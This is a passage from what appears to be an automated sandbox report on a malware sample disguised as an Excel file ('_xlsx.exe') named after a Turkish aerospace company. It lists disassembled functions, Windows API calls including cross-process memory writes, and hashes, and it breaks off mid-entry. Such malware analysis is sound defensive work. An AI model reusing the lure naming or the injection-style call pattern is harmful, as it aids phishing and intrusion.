                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 44706859-0
                                                                                                                                    • Opcode ID: c38cfb53f4073e6def0ed566f086f0d157c406a9d8caba36faa1648191df777f
                                                                                                                                    • Instruction ID: 4bb9e937b69e0f2ea17e031917875c533cde37d5cbb3baa82e0067e99756f34a
                                                                                                                                    • Opcode Fuzzy Hash: c38cfb53f4073e6def0ed566f086f0d157c406a9d8caba36faa1648191df777f
                                                                                                                                    • Instruction Fuzzy Hash: DCF04939280751BBDB215FA5EC4DF9A3BAEEF99761F214824FA49C6250CE70D8408A60
                                                                                                                                    APIs
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,001F017D,?,001F32FC,?,00000001,001C2592,?), ref: 001F0324
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,001F017D,?,001F32FC,?,00000001,001C2592,?), ref: 001F0331
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,001F017D,?,001F32FC,?,00000001,001C2592,?), ref: 001F033E
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,001F017D,?,001F32FC,?,00000001,001C2592,?), ref: 001F034B
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,001F017D,?,001F32FC,?,00000001,001C2592,?), ref: 001F0358
                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,001F017D,?,001F32FC,?,00000001,001C2592,?), ref: 001F0365
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseHandle
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2962429428-0
                                                                                                                                    • Opcode ID: 6450e2b2ddb89ac96bf1938d4fa86c9cf3e9953b175e2a937b8306bf307c5960
                                                                                                                                    • Instruction ID: 9606c89dfbc2be1baf84530137517f319dd9b9602f3ae688632605d3fac2c5ef
                                                                                                                                    • Opcode Fuzzy Hash: 6450e2b2ddb89ac96bf1938d4fa86c9cf3e9953b175e2a937b8306bf307c5960
                                                                                                                                    • Instruction Fuzzy Hash: 2D01A276800B199FC731AF66D880822F7F5BF643153158A3FD29652932C771A954CF80
                                                                                                                                    APIs
                                                                                                                                    • _free.LIBCMT ref: 001BD752
                                                                                                                                      • Part of subcall function 001B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001BD7D1,00000000,00000000,00000000,00000000,?,001BD7F8,00000000,00000007,00000000,?,001BDBF5,00000000), ref: 001B29DE
                                                                                                                                      • Part of subcall function 001B29C8: GetLastError.KERNEL32(00000000,?,001BD7D1,00000000,00000000,00000000,00000000,?,001BD7F8,00000000,00000007,00000000,?,001BDBF5,00000000,00000000), ref: 001B29F0
                                                                                                                                    • _free.LIBCMT ref: 001BD764
                                                                                                                                    • _free.LIBCMT ref: 001BD776
                                                                                                                                    • _free.LIBCMT ref: 001BD788
                                                                                                                                    • _free.LIBCMT ref: 001BD79A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                    • Opcode ID: 2f251cd16138562842b6a093a169d913e95df1321bb82d0b95b609d154e5a5ad
                                                                                                                                    • Instruction ID: dd49ca0b59fc92b5dc53de1f08f37028b655c1baa5d7f898dada154cc1ed8e21
                                                                                                                                    • Opcode Fuzzy Hash: 2f251cd16138562842b6a093a169d913e95df1321bb82d0b95b609d154e5a5ad
                                                                                                                                    • Instruction Fuzzy Hash: 6EF09032501218BB8669EB68F9CACDA7BDDBB05318BA40C05F04DE7502DF30FC808A64
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 001E5C58
                                                                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 001E5C6F
                                                                                                                                    • MessageBeep.USER32(00000000), ref: 001E5C87
                                                                                                                                    • KillTimer.USER32(?,0000040A), ref: 001E5CA3
                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 001E5CBD
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3741023627-0
                                                                                                                                    • Opcode ID: 5125660cfd82f61aa1a2c783ff2dad5b4df288f85c6d1b19bdf965b3be8720bf
                                                                                                                                    • Instruction ID: 33bcdbad6d072956c61e5f634b848ee73a7d10d34e2ae81c587bce837f73795c
                                                                                                                                    • Opcode Fuzzy Hash: 5125660cfd82f61aa1a2c783ff2dad5b4df288f85c6d1b19bdf965b3be8720bf
                                                                                                                                    • Instruction Fuzzy Hash: 7C01D634540B44ABEB245B11ED5EFEA77BDBF54B09F100159B183A20E1DBF0A984CB90
                                                                                                                                    APIs
                                                                                                                                    • _free.LIBCMT ref: 001B22BE
                                                                                                                                      • Part of subcall function 001B29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,001BD7D1,00000000,00000000,00000000,00000000,?,001BD7F8,00000000,00000007,00000000,?,001BDBF5,00000000), ref: 001B29DE
                                                                                                                                      • Part of subcall function 001B29C8: GetLastError.KERNEL32(00000000,?,001BD7D1,00000000,00000000,00000000,00000000,?,001BD7F8,00000000,00000007,00000000,?,001BDBF5,00000000,00000000), ref: 001B29F0
                                                                                                                                    • _free.LIBCMT ref: 001B22D0
                                                                                                                                    • _free.LIBCMT ref: 001B22E3
                                                                                                                                    • _free.LIBCMT ref: 001B22F4
                                                                                                                                    • _free.LIBCMT ref: 001B2305
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                    • Opcode ID: b4bab28f38015beee61b84747b69e743b16cd341f8297bdedeeb9785957c9568
                                                                                                                                    • Instruction ID: 9ac88229c8750f3832a675a35b392da3b1df4fb4a49d6b7461c851f2ccc9f38a
                                                                                                                                    • Opcode Fuzzy Hash: b4bab28f38015beee61b84747b69e743b16cd341f8297bdedeeb9785957c9568
                                                                                                                                    • Instruction Fuzzy Hash: D2F054B44013309B8653AF58BC499983B64F729752B110A06F818D3671CB3004259FE9
                                                                                                                                    APIs
                                                                                                                                    • EndPath.GDI32(?), ref: 001995D4
                                                                                                                                    • StrokeAndFillPath.GDI32(?,?,001D71F7,00000000,?,?,?), ref: 001995F0
                                                                                                                                    • SelectObject.GDI32(?,00000000), ref: 00199603
                                                                                                                                    • DeleteObject.GDI32 ref: 00199616
                                                                                                                                    • StrokePath.GDI32(?), ref: 00199631
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2625713937-0
                                                                                                                                    • Opcode ID: 5bd9a94226a121e6ce1d137d5ebcfc73071f49329c1e7c22f04f3cd27a24f3f8
                                                                                                                                    • Instruction ID: 52c795031acf647a84857515581bd19fcc619d98f537ceab2a1f0a8ad73b4e69
                                                                                                                                    • Opcode Fuzzy Hash: 5bd9a94226a121e6ce1d137d5ebcfc73071f49329c1e7c22f04f3cd27a24f3f8
                                                                                                                                    • Instruction Fuzzy Hash: EDF04934046348EBDB265F69FD1CBA93F61BB25323F248258F469950F0CB3189A5DF68
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: __freea$_free
                                                                                                                                    • String ID: a/p$am/pm
                                                                                                                                    • API String ID: 3432400110-3206640213
                                                                                                                                    • Opcode ID: 4e7a7d9b47d133fa887008bc63ada8a89b1d96579aafd9f174876520e53413ea
                                                                                                                                    • Instruction ID: edd2c25c23eb94ca5ad3fb8d0e4c56ca92f8c6a12bc86089d5853535e2da62bd
                                                                                                                                    • Opcode Fuzzy Hash: 4e7a7d9b47d133fa887008bc63ada8a89b1d96579aafd9f174876520e53413ea
                                                                                                                                    • Instruction Fuzzy Hash: 19D10731900206FADB289F68C865BFEB7F1FF16310FAB4159E9019B660E3759D80CB91
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 001A0242: EnterCriticalSection.KERNEL32(0025070C,00251884,?,?,0019198B,00252518,?,?,?,001812F9,00000000), ref: 001A024D
                                                                                                                                      • Part of subcall function 001A0242: LeaveCriticalSection.KERNEL32(0025070C,?,0019198B,00252518,?,?,?,001812F9,00000000), ref: 001A028A
                                                                                                                                      • Part of subcall function 001A00A3: __onexit.LIBCMT ref: 001A00A9
                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00206238
                                                                                                                                      • Part of subcall function 001A01F8: EnterCriticalSection.KERNEL32(0025070C,?,?,00198747,00252514), ref: 001A0202
                                                                                                                                      • Part of subcall function 001A01F8: LeaveCriticalSection.KERNEL32(0025070C,?,00198747,00252514), ref: 001A0235
                                                                                                                                      • Part of subcall function 001F359C: LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 001F35E4
                                                                                                                                      • Part of subcall function 001F359C: LoadStringW.USER32(00252390,?,00000FFF,?), ref: 001F360A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$EnterLeaveLoadString$Init_thread_footer__onexit
                                                                                                                                    • String ID: x#%$x#%$x#%
                                                                                                                                    • API String ID: 1072379062-3923245774
                                                                                                                                    • Opcode ID: 17d35f82cf469bcd6d198c001b085cf9dce0b73b255d461805a7c0ed89345b05
                                                                                                                                    • Instruction ID: a88373a132eb9bfe571ed6237fbc27d1bb4d14b60f88969bb3c7641a1af698c2
                                                                                                                                    • Opcode Fuzzy Hash: 17d35f82cf469bcd6d198c001b085cf9dce0b73b255d461805a7c0ed89345b05
                                                                                                                                    • Instruction Fuzzy Hash: 11C1B271A10206AFDB14DF58C894EBEB7B9FF59300F548069F9059B292DB70EE64CB90
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 001A0242: EnterCriticalSection.KERNEL32(0025070C,00251884,?,?,0019198B,00252518,?,?,?,001812F9,00000000), ref: 001A024D
                                                                                                                                      • Part of subcall function 001A0242: LeaveCriticalSection.KERNEL32(0025070C,?,0019198B,00252518,?,?,?,001812F9,00000000), ref: 001A028A
                                                                                                                                      • Part of subcall function 00189CB3: _wcslen.LIBCMT ref: 00189CBD
                                                                                                                                      • Part of subcall function 001A00A3: __onexit.LIBCMT ref: 001A00A9
                                                                                                                                    • __Init_thread_footer.LIBCMT ref: 00207BFB
                                                                                                                                      • Part of subcall function 001A01F8: EnterCriticalSection.KERNEL32(0025070C,?,?,00198747,00252514), ref: 001A0202
                                                                                                                                      • Part of subcall function 001A01F8: LeaveCriticalSection.KERNEL32(0025070C,?,00198747,00252514), ref: 001A0235
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                                                    • String ID: 5$G$Variable must be of type 'Object'.
                                                                                                                                    • API String ID: 535116098-3733170431
                                                                                                                                    • Opcode ID: 1b3852b9ee15b72dfe9dc75953dd2281fc745d05abfd81e47600abca1db65240
                                                                                                                                    • Instruction ID: 018d3e56c1e68ea581b5406131c00f591d09354264b5a2e75495357e31ca0816
                                                                                                                                    • Opcode Fuzzy Hash: 1b3852b9ee15b72dfe9dc75953dd2281fc745d05abfd81e47600abca1db65240
                                                                                                                                    • Instruction Fuzzy Hash: CA919C74A24309EFDB04EF54D8909BEB7B1FF59300F50805AF806AB292DB71AE65CB50
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 001EB403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001E21D0,?,?,00000034,00000800,?,00000034), ref: 001EB42D
                                                                                                                                    • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 001E2760
                                                                                                                                      • Part of subcall function 001EB3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,001E21FF,?,?,00000800,?,00001073,00000000,?,?), ref: 001EB3F8
                                                                                                                                      • Part of subcall function 001EB32A: GetWindowThreadProcessId.USER32(?,?), ref: 001EB355
                                                                                                                                      • Part of subcall function 001EB32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,001E2194,00000034,?,?,00001004,00000000,00000000), ref: 001EB365
                                                                                                                                      • Part of subcall function 001EB32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,001E2194,00000034,?,?,00001004,00000000,00000000), ref: 001EB37B
                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001E27CD
                                                                                                                                    • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 001E281A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                    • String ID: @
                                                                                                                                    • API String ID: 4150878124-2766056989
                                                                                                                                    • Opcode ID: 73a54e685f8bbe2abdc72e012e5484f4759d94548039ab77924ca2a5e9b27da9
                                                                                                                                    • Instruction ID: 4d4ac3d6e05ce07b0122a71a88068aa30f0721945bbe482c4f5832b799ce480f
                                                                                                                                    • Opcode Fuzzy Hash: 73a54e685f8bbe2abdc72e012e5484f4759d94548039ab77924ca2a5e9b27da9
                                                                                                                                    • Instruction Fuzzy Hash: 92416C72900218AFDB14DFA5CD86EEEBBB8AF19300F104055FA45B7180DB706E45CBA1
                                                                                                                                    APIs
                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe,00000104), ref: 001B1769
                                                                                                                                    • _free.LIBCMT ref: 001B1834
                                                                                                                                    • _free.LIBCMT ref: 001B183E
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, xrefs: 001B1760, 001B1767, 001B1796, 001B17CE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                                    • String ID: C:\Users\user\Desktop\TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe
                                                                                                                                    • API String ID: 2506810119-3151152429
                                                                                                                                    • Opcode ID: 4c05e5be198430cff387028c504c04264c7953edc243b33318f3ffd7aaa6e87a
                                                                                                                                    • Instruction ID: 0ec1a8576644a4a1073156279141890ccd95cc6e30f8d317fe0ef9f0e0d1d28a
                                                                                                                                    • Opcode Fuzzy Hash: 4c05e5be198430cff387028c504c04264c7953edc243b33318f3ffd7aaa6e87a
                                                                                                                                    • Instruction Fuzzy Hash: 02318E75A40258BBDB21DF99A885DDEBBFCEB95310F51416AF804D7211DB708E40CB90
                                                                                                                                    APIs
                                                                                                                                    • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 001EC306
                                                                                                                                    • DeleteMenu.USER32(?,00000007,00000000), ref: 001EC34C
                                                                                                                                    • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00251990,01715488), ref: 001EC395
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Menu$Delete$InfoItem
                                                                                                                                    • String ID: 0
                                                                                                                                    • API String ID: 135850232-4108050209
                                                                                                                                    • Opcode ID: d8b3ace6ab02b752911e6303bbdc4360184d8e87cc8cdf1bcfeae155e7a9fccb
                                                                                                                                    • Instruction ID: 72b03ef7f217c0af21f01190c71253e9d7dd86e5fe4b1d387bcb7517bf134dbe
                                                                                                                                    • Opcode Fuzzy Hash: d8b3ace6ab02b752911e6303bbdc4360184d8e87cc8cdf1bcfeae155e7a9fccb
                                                                                                                                    • Instruction Fuzzy Hash: 8F418E312047819FD724DF26DC84B5EBBA8BF95310F14861DF9A5972D1D730A905CBA2
                                                                                                                                    APIs
                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0021CC08,00000000,?,?,?,?), ref: 002144AA
                                                                                                                                    • GetWindowLongW.USER32 ref: 002144C7
                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 002144D7
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1455228528.0000000000181000.00000020.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1455205904.0000000000180000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.000000000021C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455305154.0000000000242000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455374055.000000000024C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1455411862.0000000000254000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_180000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Long
                                                                                                                                    • String ID: SysTreeView32
                                                                                                                                    • API String ID: 847901565-1698111956
                                                                                                                                    • Opcode ID: 7bab549ca31426cdb9b42ab3037fd4df32f0468ad84c75a46d0785673e48df44
                                                                                                                                    • Instruction ID: be6bc8a449d756288d36116ecbf1ca94f8c8b9e43c8fe5478972c2bd10d9245b
                                                                                                                                    • Opcode Fuzzy Hash: 7bab549ca31426cdb9b42ab3037fd4df32f0468ad84c75a46d0785673e48df44
                                                                                                                                    • Instruction Fuzzy Hash: CA318F71220206AFDF20AE38DC45BDA77A9EB28334F244715F979921D0D770ECA09B50
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 0020335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00203077,?,?), ref: 00203378
                                                                                                                                    • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0020307A
                                                                                                                                    • _wcslen.LIBCMT ref: 0020309B
                                                                                                                                    • htons.WSOCK32(00000000,?,?,00000000), ref: 00203106
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
